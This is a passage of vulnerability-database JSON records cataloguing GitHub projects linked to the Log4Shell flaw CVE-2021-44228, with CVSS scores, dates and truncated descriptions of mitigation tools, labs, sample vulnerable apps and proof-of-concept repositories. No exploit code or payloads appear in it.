"privateArea": 1}, {"lastseen": "2023-07-28T05:11:15", "description": "# JndiRemover\n\u041d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043c\u043e\u0434 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T15:48:03", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T19:26:15", "id": "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:10", "description": "# vCenter Server Workaround instructions CVE-2021-44228\n Workaro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T05:14:05", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-03-19T00:01:25", "id": "DFF2F784-9ED2-50EF-B79E-3EBF5A9B5428", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:36:59", "description": "# log4j-jndi-be-gone\n\nA [Byte Buddy](https://bytebuddy.net/) Jav...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T15:29:20", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-30T16:24:21", "id": "066BA250-177D-5017-9AC2-6B948A465ABC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T21:27:35", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T08:13:35", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T08:15:05", "id": "0D6ADE4E-8BA2-5BA9-94CB-ED90234A9B5C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T08:27:38", "description": "# Log4Shell sample vulnerable application (CVE-2021-44228)\n\nThis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T07:07:30", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-27T07:10:06", "id": "926942FE-1507-5B71-9266-0A5EDC38EE50", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:22", "description": "[![Java CI](https://github.com/Nikolas-Charalambidis/cve-2021-44...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T17:23:47", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-12-02T02:40:53", "id": "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-07-01T20:24:57", "description": "# `log4jail` \ud83d\udee1\ufe0f\n\nA fast firewall reverse proxy with TLS (HTTPS) ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T19:29:11", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-06-30T21:38:46", "id": "23A2D479-181C-599C-9C0F-9A2FF201348F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:21:15", "description": "# Log4JPOC\nPOC for CVE-2021-44228 vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T15:15:12", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T10:15:11", "id": "AF45C6B5-246A-5363-8436-954018BD121C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:48", "description": "# Log4Shell docker lab for CVE-2021-44228\n\n## The components\nThi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T19:30:35", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T14:55:14", "id": "B32ED3B3-2054-5776-B952-907BE2CBEED6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:49:34", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "7948E878-9BFE-5FEB-90AE-14C32290452F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T17:04:30", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T09:15:47", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-07-13T15:16:41", "id": "57742B88-2AA6-5788-825F-92A73CA85718", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T06:17:49", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T16:08:47", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-06T04:11:07", "id": "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T00:25:36", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T18:51:07", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-01T14:37:49", "id": "29A41C2D-FF26-591A-A88B-DDB396742BBC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:15:36", "description": "# f-for-java\na project writ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T01:31:06", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T18:06:45", "id": "76F0B9E8-D173-5309-9826-5880F8B35043", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:37:36", "description": "# Log4Shell sample vulnerable application (CVE-2021-44228)\n\nThis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T21:13:46", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-26T17:22:36", "id": "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:36:55", "description": "# CVE-2021-44228!\r\n\r\nThe current program remove the class \"org/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T15:04:31", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T22:38:29", "id": "C1878361-BBB3-5A2F-8212-945883518690", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T04:45:11", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T01:08:00", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-07-03T16:27:04", "id": "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T03:10:18", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T14:51:26", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T18:03:52", "id": "5B342AC3-2399-581E-BB6A-2EF19BC35B0C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:37:07", "description": "# log4j-log4shell-affected\nLists of affected components and affe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T14:05:05", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-03-08T09:40:40", "id": "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:04", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\n\n> [all log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 